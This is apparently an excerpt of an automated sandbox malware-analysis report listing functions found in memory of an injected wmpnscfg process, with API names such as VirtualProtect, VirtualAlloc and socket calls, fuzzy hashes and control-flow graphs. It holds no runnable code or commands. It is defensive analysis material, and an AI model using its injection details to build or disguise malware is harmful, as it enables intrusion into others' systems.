                                                                                                                    Function 000002614EFE2A20 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AcceptConnectPort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1658770261-0
                                                                                                                    • Opcode ID: 62332437ee16da287e3653c526f206484f17471112b3976b2a00ba68a8ac2207
                                                                                                                    • Instruction ID: 424e2d57114045513e450ac75387a5790a34b10e5be688a961019ba20bb3f32a
                                                                                                                    • Opcode Fuzzy Hash: 62332437ee16da287e3653c526f206484f17471112b3976b2a00ba68a8ac2207
                                                                                                                    • Instruction Fuzzy Hash: 41D05B34A187458FE710EF6CD44060A7BE1F7DA714F548618E84493321F639F45187C7
                                                                                                                    Function 000002614EFE2DDC Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,000002614EFD5367), ref: 000002614EFE2DEC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AcceptConnectPort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1658770261-0
                                                                                                                    • Opcode ID: 09515c4071d5cd1d26304305e5d382a5795874c756b6f30558b0c1d7e16e0e91
                                                                                                                    • Instruction ID: 360a373373eb85495bfa40fba3ef96a623fb7fecf1100d594bce2b6f63a2574d
                                                                                                                    • Opcode Fuzzy Hash: 09515c4071d5cd1d26304305e5d382a5795874c756b6f30558b0c1d7e16e0e91
                                                                                                                    • Instruction Fuzzy Hash: 7DC08C2061A80B4BFA246AAE5C8471520C0A34E764F880020A404C3184FC0EF6A053DA
                                                                                                                    Function 000002614EFE290C Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AcceptConnectPort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1658770261-0
                                                                                                                    • Opcode ID: ea9358fbe28cd15c97578867be2afda9ae4f1a6df4f19420141c692e89a91aba
                                                                                                                    • Instruction ID: d0603a2e18775a8f891bef4f2f55b46d13055e42a674d91bfbd615d107a5efc1
                                                                                                                    • Opcode Fuzzy Hash: ea9358fbe28cd15c97578867be2afda9ae4f1a6df4f19420141c692e89a91aba
                                                                                                                    • Instruction Fuzzy Hash: 55C08C24A1A80A4AFB0666EEBC843193090A38E720F8814009404C3180FE0EF4A063D2
                                                                                                                    Function 00007DF488D81438 Relevance: 6.1, APIs: 4, Instructions: 134registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000003.2456578531.00007DF488D81000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF488D81000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_3_7df488d81000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseInformationOpenQueryValueVolume
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4069062851-0
                                                                                                                    • Opcode ID: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
                                                                                                                    • Instruction ID: 08bf457703cba3350d781050178309d2762c576d43690af8332ef03d3cbade4d
                                                                                                                    • Opcode Fuzzy Hash: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
                                                                                                                    • Instruction Fuzzy Hash: 15411B7151CA488BE755EB24D899BDBB3F1FB94301F508A2EE48BC3191EF78D5488B42
                                                                                                                    Function 000002614EFE84C0 Relevance: 6.1, APIs: 4, Instructions: 130networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: socket$ErrorModegetsockopt
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 552242919-0
                                                                                                                    • Opcode ID: f4e6771871a383ecd65cf7c786fccd009df30cb3b3764fe840cb75ff13171734
                                                                                                                    • Instruction ID: 566eda60966ac13ff685f3eaf9ceb643fcf9c4ccddb34fe4fc26f8dc6c3579a9
                                                                                                                    • Opcode Fuzzy Hash: f4e6771871a383ecd65cf7c786fccd009df30cb3b3764fe840cb75ff13171734
                                                                                                                    • Instruction Fuzzy Hash: 2B41B674618B488FE758EF2CE85C66A77E1FB99300F51462DE44BD32A1DF38A415CB82
                                                                                                                    Function 00007DF488D98C38 Relevance: 6.1, APIs: 4, Instructions: 130networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2946281568.00007DF488D91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF488D91000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7df488d91000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: socket$ErrorModeclosesocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2183620661-0
                                                                                                                    • Opcode ID: 86a7dbef4beb537d1f960ef4159f5a72687c895cdfeef9c93758c5432ac85e68
                                                                                                                    • Instruction ID: c577407d441bffe7509904d8b6bd6cf45bb4c4329d86b55ec99ee210643dea80
                                                                                                                    • Opcode Fuzzy Hash: 86a7dbef4beb537d1f960ef4159f5a72687c895cdfeef9c93758c5432ac85e68
                                                                                                                    • Instruction Fuzzy Hash: F541493061C7488FE759EF28D85859A77E1FB98301F50C62DE49BC32A1DF789645CB41
                                                                                                                    Function 000002614EFDE2A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID: rE\
                                                                                                                    • API String ID: 544645111-988334199
                                                                                                                    • Opcode ID: 75d6d8eb26df1a839d51af674b3d6b425c3a8640e6788e6840d12e792dd5345f
                                                                                                                    • Instruction ID: 6d35665972cb68a81f862cc0b8a2e56068833b143ba06984383bc0ffe564266e
                                                                                                                    • Opcode Fuzzy Hash: 75d6d8eb26df1a839d51af674b3d6b425c3a8640e6788e6840d12e792dd5345f
                                                                                                                    • Instruction Fuzzy Hash: 8311C1313099090BEB45FB58A899BFA76DAF7D8300F441129A51FC3286DE2AED5647C2
                                                                                                                    Function 000002614EFDBC64 Relevance: 4.6, APIs: 3, Instructions: 110fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseHandleMappingOpenView
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2553196624-0
                                                                                                                    • Opcode ID: e5e44baeb6ac7a5ef2abf0622d7dcda60392d94986a7d3768f6014d184717f4c
                                                                                                                    • Instruction ID: b0349a8d9f702258c5d1984c523e25ce7e6f91c826022dda6e714ea7445cbbdf
                                                                                                                    • Opcode Fuzzy Hash: e5e44baeb6ac7a5ef2abf0622d7dcda60392d94986a7d3768f6014d184717f4c
                                                                                                                    • Instruction Fuzzy Hash: 1731C43161994C4FDB95FF24E889BEBB7D4FB94300F14452EA45BC3192EE31E5198781
                                                                                                                    Function 000002614EFDBA4C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateWindow
                                                                                                                    • String ID: P
                                                                                                                    • API String ID: 716092398-3110715001
                                                                                                                    • Opcode ID: cfa3f0b6778a70b443997505d324e50d054ac30842702c4c9102a20ff55eb27d
                                                                                                                    • Instruction ID: 45023227a009cb6e6754945b9d58b1b21e679e04ce332932f1755649bf8936fc
                                                                                                                    • Opcode Fuzzy Hash: cfa3f0b6778a70b443997505d324e50d054ac30842702c4c9102a20ff55eb27d
                                                                                                                    • Instruction Fuzzy Hash: B2511E70518B848FD7A5EF24D88A79ABBE4FB95311F10462EE09EC3291DF35A4458B83
                                                                                                                    Function 00007DF488DC47B8 Relevance: 3.3, APIs: 2, Instructions: 339windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 304 7df488dc47b8-7df488dc47f0 call 7df488dc1478 307 7df488dc4b0d-7df488dc4b32 call 7df488dc55b0 304->307 308 7df488dc47f6-7df488dc480e call 7df488dc1538 304->308 308->307 313 7df488dc4814-7df488dc4845 call 7df488dc1708 call 7df488dc1740 call 7df488dc1818 308->313 313->307 321 7df488dc484b-7df488dc485d 313->321 321->307 323 7df488dc4863-7df488dc4880 321->323 325 7df488dc4886-7df488dc48f6 call 7df488dcdb48 * 3 323->325 326 7df488dc4958-7df488dc4a0d call 7df488dcdb48 call 7df488dc28d4 call 7df488dcdb72 call 7df488dcdb6c call 7df488dcdb66 SendMessageA 323->326 344 7df488dc4953-7df488dc4956 325->344 367 7df488dc4a12-7df488dc4a18 326->367 344->326 347 7df488dc48f8-7df488dc48fb 344->347 348 7df488dc48fd-7df488dc4901 347->348 349 7df488dc4909-7df488dc4921 calloc 347->349 348->349 351 7df488dc4903-7df488dc4907 348->351 352 7df488dc4a7e 349->352 353 7df488dc4927-7df488dc4945 call 7df488dc55d0 349->353 351->349 355 7df488dc4950-7df488dc4951 351->355 359 7df488dc4a87-7df488dc4a8a 352->359 361 7df488dc4a5c-7df488dc4a60 353->361 362 7df488dc494b-7df488dc494c 353->362 355->344 363 7df488dc4a8c-7df488dc4a8f 359->363 364 7df488dc4af5-7df488dc4af6 359->364 368 7df488dc4a62-7df488dc4a66 361->368 369 7df488dc4a6b-7df488dc4a6f 361->369 370 7df488dc494e 362->370 365 7df488dc4ade 363->365 366 7df488dc4a91-7df488dc4ab4 call 7df488dcdb48 363->366 371 7df488dc4afe-7df488dc4b08 call 7df488dc2730 364->371 374 7df488dc4ae0-7df488dc4af3 365->374 383 7df488dc4abe-7df488dc4ad6 call 7df488dcdb48 366->383 384 7df488dc4ab6-7df488dc4abc 366->384 367->371 373 7df488dc4a1e-7df488dc4a24 367->373 368->370 369->370 375 7df488dc4a75-7df488dc4a79 369->375 370->355 371->307 373->371 378 7df488dc4a2a-7df488dc4a3e 373->378 374->359 374->364 375->370 378->371 385 7df488dc4a44-7df488dc4a57 call 7df488dc55d0 378->385 383->365 384->365 385->374
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2946446413.00007DF488DC1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF488DC1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7df488dc1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FunctionMessageProtectSendTableVirtualcalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2453823186-0
                                                                                                                    • Opcode ID: f21b9ec484d8d2d9b9243406eb49c24197b694a35871426f8b048c7a46f2aacc
                                                                                                                    • Instruction ID: 0f32334f03f5b73d5aa95744479f43bcffff7a7e00de2f84dafff161960f9e4a
                                                                                                                    • Opcode Fuzzy Hash: f21b9ec484d8d2d9b9243406eb49c24197b694a35871426f8b048c7a46f2aacc
                                                                                                                    • Instruction Fuzzy Hash: 72B1353161CA584BDBA5EF64D4845AB73F3FFA4300F508A2ED04BC3292DE78E9058785
                                                                                                                    Function 00007DF488D94290 Relevance: 3.2, APIs: 2, Instructions: 244windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2946281568.00007DF488D91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF488D91000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7df488d91000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FunctionMessageProtectSendTableVirtualcalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2453823186-0
                                                                                                                    • Opcode ID: 9476529166d77aa32403f16abccb553efbe971cbc2abc63400368bf18a283a5f
                                                                                                                    • Instruction ID: 5ad834304de3bf3868c0ae26ad78a64b5d95f9d36a324cd9cbbec5f716899af7
                                                                                                                    • Opcode Fuzzy Hash: 9476529166d77aa32403f16abccb553efbe971cbc2abc63400368bf18a283a5f
                                                                                                                    • Instruction Fuzzy Hash: 6D71833061CA488FDB95EF28D8815AB73F2FF54700B50862AE44FC7196DA78F9458BC1
                                                                                                                    Function 000002614EFD22D4 Relevance: 3.2, APIs: 2, Instructions: 222memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 515 2614efd22d4-2614efd2303 GetSystemInfo 516 2614efd2305-2614efd2310 515->516 517 2614efd2313-2614efd2329 515->517 516->517 518 2614efd232f-2614efd2332 517->518 519 2614efd234e-2614efd2354 518->519 520 2614efd2334-2614efd2337 518->520 521 2614efd23cf-2614efd23d2 519->521 522 2614efd2356-2614efd2366 519->522 523 2614efd2349-2614efd234c 520->523 524 2614efd2339-2614efd233c 520->524 526 2614efd245e 521->526 525 2614efd2395-2614efd239b 522->525 523->518 524->523 527 2614efd233e-2614efd2343 524->527 529 2614efd239d 525->529 530 2614efd2368-2614efd237f 525->530 531 2614efd2460-2614efd2463 526->531 532 2614efd246b-2614efd2482 526->532 527->523 528 2614efd24b1-2614efd24c3 527->528 533 2614efd239f-2614efd23a2 529->533 530->529 543 2614efd2381-2614efd2389 530->543 534 2614efd2469 531->534 535 2614efd23d7-2614efd23f5 531->535 536 2614efd2484-2614efd249e 532->536 533->521 538 2614efd23a4-2614efd23c4 VirtualAlloc 533->538 534->528 540 2614efd2437 535->540 541 2614efd23f7-2614efd240e 535->541 536->536 539 2614efd24a0-2614efd24ab 536->539 538->532 544 2614efd23ca-2614efd23cd 538->544 539->528 542 2614efd2439-2614efd243c 540->542 541->540 548 2614efd2410-2614efd2418 541->548 542->528 546 2614efd243e-2614efd245c 542->546 543->533 547 2614efd238b-2614efd2393 543->547 544->521 544->522 546->526 547->525 547->529 548->542 549 2614efd241a-2614efd2435 548->549 549->540 549->541
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocInfoSystemVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3440192736-0
                                                                                                                    • Opcode ID: 97221a5a18e4aacc6e4870847a1657838270caee770a845de3dac3f068ae24cc
                                                                                                                    • Instruction ID: eaec22709c121c102bc33932cd735be90d57ca75f9909dc12261f498e2db4435
                                                                                                                    • Opcode Fuzzy Hash: 97221a5a18e4aacc6e4870847a1657838270caee770a845de3dac3f068ae24cc
                                                                                                                    • Instruction Fuzzy Hash: 8D510630319E0D8FFB55EBACA48CB6A76D1F798300F484129D85AC3195EE77E89287C1
                                                                                                                    Function 000002614EFDD7C0 Relevance: 3.2, APIs: 2, Instructions: 155fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseFileHandleViewmalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4055022194-0
                                                                                                                    • Opcode ID: 2545b146e03987401e8860446111752460087adb5538b97f3e49e3c2a2eae485
                                                                                                                    • Instruction ID: 74e5bcaeeaf21bf3c1ddb806a503ec2011d73430ffd9358c72953b43f3c0e37a
                                                                                                                    • Opcode Fuzzy Hash: 2545b146e03987401e8860446111752460087adb5538b97f3e49e3c2a2eae485
                                                                                                                    • Instruction Fuzzy Hash: 6A417F712159088FEB46FF68E889BA777D4EB95301F040629A41BC3192DE37F9168BC2
                                                                                                                    Function 000002614EFD2978 Relevance: 3.1, APIs: 2, Instructions: 97memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 71851ab31bd5e99a8088f9e241981b9a75f35149f95cf9a9c2613fb5189a6f34
                                                                                                                    • Instruction ID: 98356926de11810e4228a24b62488215cbb4e214c7f492ad272c7874ab7b8361
                                                                                                                    • Opcode Fuzzy Hash: 71851ab31bd5e99a8088f9e241981b9a75f35149f95cf9a9c2613fb5189a6f34
                                                                                                                    • Instruction Fuzzy Hash: AF31393020CA454BFB109B6CE898B963FD1FB5A310F190295E89AC72C9CB56D803C3C5
                                                                                                                    Function 00007DF488D91740 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2946281568.00007DF488D91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF488D91000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7df488d91000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 008c1c100189bfc35651791388f787f69f2d51d68de1c2a05aeaf1d2b03de7f2
                                                                                                                    • Instruction ID: 2c55f2cbbdf27bcf15583c0203779cee5c936f1cd03bac8041cf27bc9668b8f8
                                                                                                                    • Opcode Fuzzy Hash: 008c1c100189bfc35651791388f787f69f2d51d68de1c2a05aeaf1d2b03de7f2
                                                                                                                    • Instruction Fuzzy Hash: B321E031A0868687EF999B2D9C84A77B3F1FF94300F14962AE44FC7385D66CF8098285
                                                                                                                    Function 00007DF488DE12C8 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2946598852.00007DF488DE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF488DE1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7df488de1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
                                                                                                                    • Instruction ID: ceff63c14bc3c3c6372812f9bbc70cae304acf66703376e5669e24492e791b86
                                                                                                                    • Opcode Fuzzy Hash: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
                                                                                                                    • Instruction Fuzzy Hash: FF21E232B0858547EFD89B6CD8846BAB3F1FF94302F54913AE84BC7A85D668F8098255
                                                                                                                    Function 00007DF488DC1740 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2946446413.00007DF488DC1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF488DC1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7df488dc1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 79a23d149b39818e3e43e8007e45963aa9a0f0bf87d1b18fa9329f731b042926
                                                                                                                    • Instruction ID: 199be90173851f7fa68af0d06f60987640d23521290e1ed3727a6242e71e9e8f
                                                                                                                    • Opcode Fuzzy Hash: 79a23d149b39818e3e43e8007e45963aa9a0f0bf87d1b18fa9329f731b042926
                                                                                                                    • Instruction Fuzzy Hash: 7121023160866587EF989B2CC894673B3F2FFA0300F14922AE44FC73C5D668E809C285
                                                                                                                    Function 00007DF488D812C8 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000003.2456578531.00007DF488D81000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF488D81000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_3_7df488d81000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
                                                                                                                    • Instruction ID: 3dc2836b68d22d696c597362c5fb121f4549fde8a4eb42f7f2f9200a26abbb14
                                                                                                                    • Opcode Fuzzy Hash: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
                                                                                                                    • Instruction Fuzzy Hash: 0B21243161868947EF988B6DC480A7AB3F1FF90300F14993AE84FC7A85D768F80D9284
                                                                                                                    Function 000002614F014C3C Relevance: 2.5, APIs: 2, Instructions: 42COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
                                                                                                                    • Instruction ID: 27c63d4cd1830a5d4456e696c61f2923f058154642c8f292722fedd53c835c8b
                                                                                                                    • Opcode Fuzzy Hash: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
                                                                                                                    • Instruction Fuzzy Hash: 0DF06D70210D0A4FEFD4EF698498F2633D6EBD9350FA41255980AC72A5DF23EC92C740
                                                                                                                    Function 000002614EFDCC9C Relevance: 1.7, APIs: 1, Instructions: 228fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738559852-0
                                                                                                                    • Opcode ID: f573dec0403348014450f7ba306745c6dd418323538c19bace6ad6f3c15519fa
                                                                                                                    • Instruction ID: 384f91c3f7b67e091897127897e9c2d7792ce8018303586688b878ffa163c25f
                                                                                                                    • Opcode Fuzzy Hash: f573dec0403348014450f7ba306745c6dd418323538c19bace6ad6f3c15519fa
                                                                                                                    • Instruction Fuzzy Hash: A8712571209B048FE7A9EF18E885A6677E5FB94710F04065DE49BC3192EE32F812C7C1
                                                                                                                    Function 00007DF488D815E8 Relevance: 1.7, APIs: 1, Instructions: 228COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000003.2456578531.00007DF488D81000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF488D81000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_3_7df488d81000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileMappingOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1680863896-0
                                                                                                                    • Opcode ID: a4d7378eb0dc183d45dac9fde789c38604b4b9a60361aa9a1ccba498305d516d
                                                                                                                    • Instruction ID: 9ef99bde30efa07667a656c4c4db383a6b3131d0ce74fb193e9b002f04b26cfb
                                                                                                                    • Opcode Fuzzy Hash: a4d7378eb0dc183d45dac9fde789c38604b4b9a60361aa9a1ccba498305d516d
                                                                                                                    • Instruction Fuzzy Hash: 6D71757161C7898FD765EB28D4857ABB7F1FB98301F004A3EE58FC3152EA34A5059B82
                                                                                                                    Function 000002614EFD6C68 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2340568224-0
                                                                                                                    • Opcode ID: f5a0fb9eb97d8a0cea1a0077705b63a589f7aa8c555666e722ed38cdf1e7e3b3
                                                                                                                    • Instruction ID: 4f3714b2895bf022f6e260e2fc810032dd9e12a0c420fea1cb824148dc71c40c
                                                                                                                    • Opcode Fuzzy Hash: f5a0fb9eb97d8a0cea1a0077705b63a589f7aa8c555666e722ed38cdf1e7e3b3
                                                                                                                    • Instruction Fuzzy Hash: 3C41BD3021590807EB55F728F899BBB37D5E794310F090A299817C31D2DE2BE51646C2
                                                                                                                    Function 000002614EFD77DC Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
